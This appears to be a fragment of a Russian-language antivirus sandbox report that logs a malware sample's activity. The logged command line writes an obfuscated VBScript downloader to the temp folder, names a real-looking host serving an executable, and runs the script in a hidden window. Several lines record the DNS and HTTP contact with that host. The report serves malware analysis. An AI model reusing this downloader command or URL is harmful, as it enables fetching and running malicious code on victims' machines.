Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO R4q= "http://a.pomf.cat/cdwujo.exe">>T2d.VBS &@ECHO W2x = Z4y("ccha^H_r_")>>T2d.VBS &@ECHO Set E0l = CreateObject(Z4y("gmrgfLHrgfbnnj"))>>T2d.VBS &@ECHO E0l.Open Z4y("a_n")...
- %TEMP%\t2d.vbs
- %TEMP%\t2d.vbs
- 'a.##mf.cat':80
- http://a.##mf.cat/cdwujo.exe
- DNS ASK a.##mf.cat
- '<SYSTEM32>\wscript.exe' "%TEMP%\T2d.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO R4q= "http://a.pomf.cat/cdwujo.exe">>T2d.VBS &@ECHO W2x = Z4y("ccha^H_r_")>>T2d.VBS &@ECHO Set E0l = CreateObject(Z4y("gmrgfLHrgfbnnj"))>>T2d.VBS &@ECHO E0l.Open Z4y("a_n")...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13